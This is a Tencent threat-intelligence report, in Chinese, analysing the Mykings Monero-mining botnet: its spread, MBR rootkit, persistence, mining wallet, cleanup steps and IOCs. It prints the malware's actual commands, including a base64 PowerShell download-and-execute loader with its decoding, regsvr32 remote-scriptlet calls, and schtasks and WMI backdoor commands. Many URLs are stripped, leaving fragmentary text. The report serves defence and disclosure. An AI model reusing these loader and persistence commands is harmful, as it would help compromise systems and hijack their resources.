Mykings挖矿僵尸网络更新基础设施,新钱包收益超过60万

              本文重点:Mykings挖矿僵尸网络更新基础设施,新钱包收益超过60万

              背景腾讯安全御见威胁情报中心近期检测到Mykings挖矿僵尸网络更新基础设施,病毒启用了新的域名,挖矿使用新的钱包收益已超过60万人民币,并且仍每天以约10个XMR的速度挖掘。

              Mykings通过143背景Mykings通过1433端口爆破、永恒之蓝漏洞攻击等方法进入系统,然后植入RAT、Miner等木马,组成庞大的僵尸网络。

              Mykings挖矿僵尸网络更新版本具有以下特点:1.利用永恒之蓝漏洞、1433端口爆破等方法进行攻击,并包含Mirai僵尸网络的感染代码。

              2.感染MBR(感染流程与暗云病毒一致),通过Rookit对抗杀软以及下载Payload。 3.清除竞品挖矿木马,关闭端口封堵其他病毒的入侵渠道。

              4.通过安装多个计划任务后门、WMI后门进行持久化。

              Mykings挖矿僵尸网络详细分析$wc=;$(http:///).trim()-split[\r]+|%{$n=$_.split(/)[-1];$($_,$n);start$n;然后从中获取3个木马的下载地址,依次下载和执行:上述三个木马分析如下:感染流程与腾讯御见威胁情报中心发现的暗云系列病毒(参考https:///research/report/)类似。 MBR木马在最后一个阶段对ZwCreateSection进行HOOK,在获得执行机会后将rootkit映射到内核空间并执行,最后跳转到ZwCreateSection继续执行。 Rootkit主要功能为自保护,结束杀软进程,及注入系统进程联网下载payload执行下一阶段的恶意行为。

              Rootkit获取用于更新木马的IP地址http[:]///获取下一阶段Payload代码配置文件http[:]///,从该配置文件中得到挖矿模块的下载地址,随后下载执行该文件。

              获取要清除的竞争对手或者老版本的挖矿木马,包括文件名、路径、是否清除。 然后通过读注册表位置(HARDWARE\DESCRIPTION\System\CentralProcessor\0)检测CPU类型及频率,根据CPU的类型和频率确定使用哪种类型的挖矿程序。 下载开源挖矿程序XMRig,地址为http[:]///,程序版本,挖矿程序启动路径为C:\Windows\inf\启动后从资源文件中获取挖矿配置文件,得到矿池地址::5555钱包:455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2根据钱包查询收益:已挖矿获得1077个XMR当前市场价格折合人民币60万元扫描445/1433等端口永恒之蓝漏洞攻击SQL爆破攻击爆破登录后执行ShellcodeTelnet爆破攻击RDP爆破攻击持久化1.删除其他病毒设置的登录账户通过netuser删除账户mm123$、admin、sysadm05;attrib命令设置Temp目录下文件为隐藏属性;taskkill杀死其他挖矿进程,删除其他挖矿进程文件、远程桌面程序文件;cacls设置部分目录及文件的可见性。

              通过wmic命令删除伪装成系统进程的挖矿程序,判断依据为文件为系统进程名,但是却不在系统目录下。 2.设置相关文件、路径的属性为隐藏3.关闭系统自更新删除以下计划任务,关闭系统自更新:SCHTASKS/Delete/TNWindowsUpdate1/FSCHTASKS/Delete/TNWindowsUpdate3/FSCHTASKS/Delete/TNWindows_Update/FSCHTASKS/Delete/TNUpdate/FSCHTASKS/Delete/TNUpdate2/FSCHTASKS/Delete/TNUpdate4/FSCHTASKS/Delete/TNUpdate3/FSCHTASKS/Delete/TNwindowsinit/FSCHTASKS/Delete/TNSystemSecurityCheck/FSCHTASKS/Delete/TNAdobeFlashPlayer/FSCHTASKS/Delete/TNupdat_windows/FSCHTASKS/Delete/TNat1/FSCHTASKS/Delete/TNat2/FSCHTASKS/Delete/TNMicrosoftLocalManager[WindowsServer2008R2Enterprise]/FSCHTASKS/DELETE/TN\Microsoft\Windows\UPnP\Services/fSCHTASKS/Delete/TNMicrosoftLocalManager[WindowsServer2008R2Standard]/F4.阻止139/445等端口的连接网络防火墙设置,设置65536端口的连接请求为允许,设置135/137/138/139/445端口的连接为拒绝。 5.添加注册表启动项添加注册表Run启动项:6.添加大量计划任务后门添加5个计划任务:任务1:Mysa执行:cmd/:\windows\:sc:\windows\任务2:Mysa1执行::\windows\debug\,ServiceMainaaaa任务3:Mysa2执行:cmd/:\windows\debug\:p任务4:Mysa3执行:/:\windows\help\:psc:\windows\help\任务5:ok执行:cmdc:\windows\debug\,ServiceMainaaaa各计划任务后门功能整理如下:7.添加执行大量命令的WMI后门通过创建WMI事件过滤器和消费者来添加后门。 删除旧的事件过滤器和消费者:fuckyoumm2_filterfuckyoumm2_consumerWindowsEventsFilterWindowsEventsConsumer4WindowsEventsConsumerfuckayoumm3fuckayoumm4创建新的事件过滤器和消费者:fuckyoumm3fuckyoumm4WMI后门执行的代码为:(1)AG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA==(解码后:$wc=;$(http[:]///).trim()-split[\r]+|%{$n=$_.split(/)[-1];$($_,$n);start$n;})(2)().DownloadString(http[:]///)(3)().DownloadString(http[:]///)(4)().DownloadString(http[:]///)||regsvr32/u/s/i:http[:]///(5)regsvr32/u/s/i:http[:]///(6)regsvr32/u/s/i:http[:]///后门执行的命令功能整理如下:安全建议服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https:///web_clinic/s8/下载并更新Windows系统补丁,及时修复永恒之蓝系列漏洞XP、WindowsServer2003、win8等系统访问:http:///=KB4012598Win7、、WindowsServer2008、Windows10,WindowsServer2016等系统访问:https:///zh-cn/library/security/、服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;3、使用杀毒软件拦截可能的病毒攻击;4、感染Mykings病毒的用户除了使用腾讯御点进行查杀外,还可通过以下步骤进行手动清理:1)删除文件C:\Windows\System32\:\WINDOWS\system32\:\Windows\SysWOW64\drivers\:\WINDOWS\system\:\WINDOWS\Temp\:\windows\system32\:\Windows\inf\:\WINDOWS\inf\:\windows\system32\:\WINDOWS\system\:\Windows\Help\:\windows\debug\:\windows\debug\)删除注册表HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\startHKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run\start3)删除计划任务MysaMysa1Mysa2Mysa3ok4)删除WMI事件过滤器及消费者fuckyoumm2_filterfuckyoumm2_consumerWindowsEventsFilterWindowsEventsConsumer4WindowsEventsConsumerfuckayoumm3fuckayoumm4fuckyoumm3fuckyoumm4IOCsMD59F86AFAE88B2D807A71F442891DFE3D4147BA798E448EB3CAA7E477E7FB3A959B89B37A90D0A080C34BBBA0D53BD66DF1A5EC4861CC11742D308145C32A3842A5835094B232F999C20FE2B76E967345549CC3130496079EBFEA58A069AA4B97AE5F19CBFBBABA501D4D9A90856FF17D3A1B9F55BF93E82550B4C21CD3230C3C31F0EC5A4B101837EA7CD08FCB3247B2BFA066F[:]///[:]//:280/[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///ok/[:]///ok/[:]///[:]///[:]///[:]///[:]//:808/[:]///cudart32_[:]///[:]///ok/[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///[:]///钱包:455WeUnLXMi2ScZ7WLb9apVTWLe98f6zjR9Sys78txuVckB5cwsNjQyXiV9oTUXj1s93aDVWcTh2dMuMbbT5abe715dNSR2参考链接https:///articles/web/:///research/report/:///column/来源:腾讯御见威胁情报中心。